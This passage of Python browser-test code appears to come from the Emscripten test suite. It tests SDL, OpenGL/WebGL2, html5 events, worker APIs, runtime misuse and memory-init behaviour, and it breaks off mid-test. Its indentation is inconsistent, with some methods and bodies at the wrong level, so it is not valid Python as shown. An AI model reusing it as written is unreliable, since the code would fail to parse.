  def test_sdl_canvas_twice(self):
    self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
  def test_sdl_set_clip_rect(self):
    self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
  def test_sdl_maprgba(self):
    self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
  def test_sdl_create_rgb_surface_from(self):
    self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
  def test_sdl_rotozoom(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
  def test_sdl_gfx_primitives(self):
    self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
  def test_sdl_ttf_render_text_solid(self):
    self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
  def test_sdl_alloctext(self):
    self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
  def test_sdl_surface_refcount(self):
    self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
  def test_sdl_free_screen(self):
    self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
  @requires_graphics_hardware
  def test_glbegin_points(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
  # S3TC/DDS compressed-texture tests.
  @requires_graphics_hardware
  def test_s3tc(self):
    shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
    self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_s3tc_ffp_only(self):
    # Same test restricted to the fixed-function-pipeline-only fast path.
    shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
    self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
  @no_chrome('see #7117')
  @requires_graphics_hardware
  def test_aniso(self):
    shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
    self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
  @requires_graphics_hardware
  def test_tex_nonbyte(self):
    self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_float_tex(self):
    self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
  @requires_graphics_hardware
  def test_subdata(self):
    self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
  @requires_graphics_hardware
  def test_perspective(self):
    self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
  @requires_graphics_hardware
  def test_glerror(self):
    self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure', '1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
  def test_openal_capture_sanity(self):
    # Audio capture API sanity check; expects result 0.
    self.btest('openal_capture_sanity.c', expected='0')
  def test_runtimelink(self):
    # Runtime dynamic linking: build supp.cpp as a SIDE_MODULE and main.cpp as
    # a MAIN_MODULE that loads it via RUNTIME_LINKED_LIBS; main's exit code is
    # suppInt (76), which btest_exit checks.
    create_test_file('header.h', r'''
      struct point
      {
        int x, y;
      };
    ''')
    create_test_file('supp.cpp', r'''
      #include <stdio.h>
      #include "header.h"
      extern void mainFunc(int x);
      extern int mainInt;
      void suppFunc(struct point &p) {
        printf("supp: %d,%d\n", p.x, p.y);
        mainFunc(p.x + p.y);
        printf("supp see: %d\n", mainInt);
      }
      int suppInt = 76;
    ''')
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include "header.h"
      extern void suppFunc(struct point &p);
      extern int suppInt;
      void mainFunc(int x) {
        printf("main: %d\n", x);
      }
      int mainInt = 543;
      int main( int argc, const char *argv[] ) {
        struct point p = { 54, 2 };
        suppFunc(p);
        printf("main see: %d\nok.\n", suppInt);
        return suppInt;
      }
    ''')
    self.compile_btest(['supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
    self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.wasm"]', '-s', 'EXPORT_ALL'], expected='76')
def test_pre_run_deps(self):
    """A run dependency added in preRun must delay run() until it is removed."""
    # Adding a dependency in preRun will delay run
    create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
    # Exercise both with and without a separate memory init file.
    for mem in [0, 1]:
        self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
    """Writing to memory before the memory init file arrives: with ASSERTIONS
    we detect it (result 9); without, the early write is silently overwritten
    (result 3). wasm2js (WASM=0) only, since only then is there a mem init file."""
    create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
    create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
    # with assertions, we notice when memory was written to too early
    self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
    # otherwise, we just overwrite
    self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
    """Overriding Module.memoryInitializerRequest: a valid URL succeeds
    (result 1); a bogus URL triggers the console warning path (result 0)."""
    def test(what, status):
        # `what` is the URL the XHR fetches; `status` is the expected result.
        print(what, status)
        create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
        self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
    test('test.html.mem', '1')
    test('nothing.nowhere', '0')
def test_runtime_misuse(self):
    """Calling compiled code (ccall / cwrap / direct _func) before the runtime
    is initialized, or after EXIT_RUNTIME has shut it down, must abort with an
    assertion; calling while the runtime is alive must succeed. Exercised for
    wasm and WASM=0, and for programs with and without a main()."""
    # JS helpers that invoke the compiled 'note' entry point in three ways.
    post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
    # Tries all three call styles; each must throw unless expected_ok is set.
    post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
    # Reports the accumulated result once main() has run (a valid call time).
    post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
    create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
    for filename, extra_args, second_code in [
        ('runtime_misuse.cpp', [], 600),
        ('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
    ]:
        for mode in [[], ['-s', 'WASM=0']]:
            print('\n', filename, extra_args, mode)
            print('mem init, so async, call too early')
            create_test_file('post.js', post_prep + post_test + post_hook)
            self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
            print('sync startup, call too late')
            create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
            self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
            print('sync, runtime still alive, so all good')
            create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
            self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
    """cwrap must be usable from a pre-js, before the runtime is fully up."""
    flags = [
        '-O2',
        '-s', 'ASSERTIONS',
        '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'),
        '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]',
    ]
    self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=flags, expected='0')
def test_worker_api(self):
    """Build a worker exporting _one, then drive it from the main program."""
    worker_flags = ['-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]']
    self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js'] + worker_flags)
    self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
    """Worker API with multiple exports, O2, closure, and unminified output."""
    worker_flags = [
        '-s', 'BUILD_AS_WORKER',
        '-O2', '--minify', '0',
        '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]',
        '--closure', '1',
    ]
    self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js'] + worker_flags)
    self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
    """Third worker-API variant with a single export."""
    worker_flags = ['-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=["_one"]']
    self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js'] + worker_flags)
    self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
    """Worker API where the worker sleeps via ASYNCIFY."""
    worker_flags = [
        '-s', 'BUILD_AS_WORKER',
        '-s', 'EXPORTED_FUNCTIONS=["_one"]',
        '-s', 'ASYNCIFY',
    ]
    self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js'] + worker_flags)
    self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
    """emscripten_async_wget2 API coverage."""
    self.btest('test_emscripten_async_wget2.cpp', args=[], expected='0')
def test_module(self):
    """MAIN_MODULE loading a SIDE_MODULE built as lib.wasm with two exports."""
    side_cmd = [
        path_from_root('tests', 'browser_module.cpp'),
        '-o', 'lib.wasm',
        '-O2',
        '-s', 'SIDE_MODULE',
        '-s', 'EXPORTED_FUNCTIONS=[_one,_two]',
    ]
    self.compile_btest(side_cmd)
    self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
def test_preload_module(self):
    """A preloaded side module (.so) should appear in Module['preloadedWasm']
    and be loadable via dlopen/dlsym at runtime."""
    create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
    self.compile_btest(['library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
    # Rename so dlopen sees a conventional shared-library name.
    os.rename('library.wasm', 'library.so')
    # Exit codes: 1 = not preloaded, 2 = dlopen failed, 3 = dlsym/call failed.
    create_test_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
    # --use-preload-plugins is what triggers wasm preloading of the .so file.
    self.btest_exit(
        'main.c',
        args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'],
        expected='0')
def test_mmap_file(self):
    """mmap over a preloaded data file."""
    payload = 'data from the file ' + '.' * 9000
    create_test_file('data.dat', payload)
    self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
    """Compile-only smoke test for the --cpuprofiler/--memoryprofiler tooling."""
    flags = [
        '-DLONGTEST=1',
        '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1',
        '-O2',
        '--cpuprofiler', '--memoryprofiler',
        '-lGL', '-lglut',
        '-DANIMATE',
    ]
    self.btest('hello_world_gles.c', expected='0', args=flags)
def test_uuid(self):
    """Test libuuid UUID generation in both shell and browser environments.

    First compiles with closure and checks that the high-quality entropy
    sources (require('crypto').randomBytes / window.crypto.getRandomValues)
    survive minification, runs the result under self.run_js, then runs the
    same test in the browser via btest.
    """
    # Run with ./runner.py browser.test_uuid
    # We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
    # high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
    # First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
    # require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
    self.run_process([EMCC, '-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
    # Fix: read via a context manager instead of leaking the file handle
    # (the original used bare open('test.js').read()).
    with open('test.js') as f:
        test_js_closure = f.read()
    # Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
    assert ").randomBytes" in test_js_closure
    assert "window.crypto.getRandomValues" in test_js_closure
    out = self.run_js('test.js')
    print(out)
    # Tidy up files that might have been created by this test.
    try_delete(path_from_root('tests', 'uuid', 'test.js'))
    try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
    # Now run test in browser
    self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
    """GLEW init in all four combinations of legacy-GL emulation and GLEW_MX."""
    base = ['-lGL', '-lSDL', '-lGLEW']
    variants = (
        [],
        ['-s', 'LEGACY_GL_EMULATION'],
        ['-DGLEW_MX'],
        ['-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'],
    )
    for extra in variants:
        self.btest(path_from_root('tests', 'glew.c'), args=base + extra, expected='1')
def test_doublestart_bug(self):
    """Regression test: adding and immediately removing a run dependency in
    preRun must not cause the runtime to start twice (expected result 1)."""
    create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
    self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
    '': ([],),
    'closure': (['-O2', '-g1', '--closure', '1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
    'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
    'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
    """Core html5.h event API, parameterized over closure/pthread/legacy-browser builds."""
    self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
    """HTML5 Gamepad API across plain, closure, and proxied-pthread builds."""
    configurations = (
        [],
        ['-O2', '-g1', '--closure', '1'],
        ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
    )
    for extra in configurations:
        print(extra)
        self.btest(path_from_root('tests', 'test_gamepad.c'), args=list(extra), expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
    """WebGL context creation with antialiasing disabled."""
    for extra in ([], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']):
        print(extra)
        flags = list(extra) + ['-DNO_ANTIALIAS', '-lGL']
        self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=flags, expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
    """WebGL context creation (with antialiasing) across build configurations."""
    configurations = (
        [],
        ['-O2', '-g1', '--closure', '1'],
        ['-s', 'FULL_ES2=1'],
        ['-s', 'USE_PTHREADS'],
    )
    for extra in configurations:
        print(extra)
        self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=list(extra) + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
    """Regression test for issue #4556 (context on Module.canvas with no ID)."""
    self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
    """Special event targets (window/document/canvas) in the deprecated find-target mode."""
    self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
    """Destroying a WebGL context cleanly, across build configurations."""
    for extra in ([], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']):
        print(extra)
        flags = list(extra) + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL']
        self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=flags, expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
    """glReadPixels against the advertised GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair."""
    if WINDOWS:
        self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
    self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
    """glShaderSource with explicit source lengths (PR #5373 regression test)."""
    for extra in ([], ['-s', 'FULL_ES2=1']):
        print(extra)
        self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=list(extra) + ['-lGL'], expected='0')
def test_webgl2(self):
    """WebGL2 core functionality across several build configurations."""
    configurations = (
        ['-s', 'MIN_CHROME_VERSION=0'],
        ['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
        ['-s', 'FULL_ES2=1'],
    )
    for extra in configurations:
        print(extra)
        flags = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + list(extra)
        self.btest(path_from_root('tests', 'webgl2.cpp'), args=flags, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
    """WebGL2 rendering on the main thread in a pthreads-enabled build."""
    # test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
    # (the testcase doesn't even use threads, but is compiled with thread support).
    self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
    """WebGL2 object APIs (VAOs, samplers, etc.)."""
    flags = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
    self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=flags, expected='0')
def test_html5_webgl_api(self):
    """html5.h WebGL API with OffscreenCanvas, offscreen framebuffer, and plain modes."""
    modes = (
        ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
        ['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
        [],
    )
    for mode in modes:
        # Skip the OffscreenCanvas variant on runners that lack support.
        if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
            continue
        flags = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + list(mode)
        self.btest(path_from_root('tests', 'html5_webgl.c'), args=flags, expected='0')
def test_webgl2_ubos(self):
    """WebGL2 uniform buffer objects."""
    flags = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
    self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=flags, expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
    """Garbage-free GL entry points, with and without WebGL2 enabled."""
    webgl2_flags = ['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1']
    self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=webgl2_flags, expected='1')
    self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
    """WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION: WebGL1-style calls on a WebGL2 context."""
    flags = ['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1']
    self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=flags, expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
    """Fallback from a failed WebGL2 context creation to a manual WebGL1 context."""
    # tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
    # but context creation fails, that we can then manually try to create a
    # WebGL1 context and succeed.
    self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
    """glTexImage2D with an invalid type on a WebGL2 context must be handled."""
    flags = ['-s', 'MAX_WEBGL_VERSION=2']
    self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=flags, expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
    """WebGL2 code must survive closure-compiler minification."""
    flags = ['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL']
    self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=flags, expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
def test_webgl2_packed_types(self):
    """glVertexAttribPointer with packed vertex types under GL_ASSERTIONS."""
    flags = ['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS']
    self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=flags, expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
    """WebGL2 pixel buffer objects."""
    flags = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
    self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=flags, expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
    """Sokol mipmap sample as a reftest against its reference PNG."""
    src = path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c')
    ref = os.path.join('third_party', 'sokol', 'mipmap-emsc.png')
    self.btest(src, args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
               reference=ref, reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
    """Sokol multiple-render-target sample reftest."""
    src = path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c')
    ref = os.path.join('third_party', 'sokol', 'mrt-emcc.png')
    self.btest(src, args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], reference=ref)
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
    """Sokol array-texture sample reftest."""
    src = path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c')
    ref = os.path.join('third_party', 'sokol', 'arraytex-emsc.png')
    self.btest(src, args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], reference=ref)
def test_sdl_touch(self):
    """SDL touch-event handling, with and without closure."""
    for extra in ([], ['-O2', '-g1', '--closure', '1']):
        print(extra)
        flags = list(extra) + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL']
        self.btest(path_from_root('tests', 'sdl_touch.c'), args=flags, expected='0')
def test_html5_mouse(self):
    """html5.h mouse events, with and without closure."""
    for extra in ([], ['-O2', '-g1', '--closure', '1']):
        print(extra)
        flags = list(extra) + ['-DAUTOMATE_SUCCESS=1']
        self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=flags, expected='0')
def test_sdl_mousewheel(self):
    """SDL mouse-wheel events, with and without closure."""
    for extra in ([], ['-O2', '-g1', '--closure', '1']):
        print(extra)
        flags = list(extra) + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL']
        self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=flags, expected='0')
def test_wget(self):
    """emscripten_wget of a local file, using ASYNCIFY to block until done."""
    create_test_file('test.txt', 'emscripten')
    self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
    """emscripten_wget_data of a local file, optimized build with ASYNCIFY."""
    create_test_file('test.txt', 'emscripten')
    flags = ['-O2', '-g2', '-s', 'ASYNCIFY']
    self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=flags)
def test_locate_file(self):
    """Module.locateFile redirection for the .wasm / .mem / .data files.

    Verifies that the runtime fetches its companion files from the location
    returned by locateFile, both when locateFile is injected via a pre-js and
    when it is defined inline in the shell HTML. For WASM=0, also checks that
    the memory initializer request actually succeeded (HTTP 200).
    """
    for wasm in [0, 1]:
        print('wasm', wasm)
        self.clear()
        create_test_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
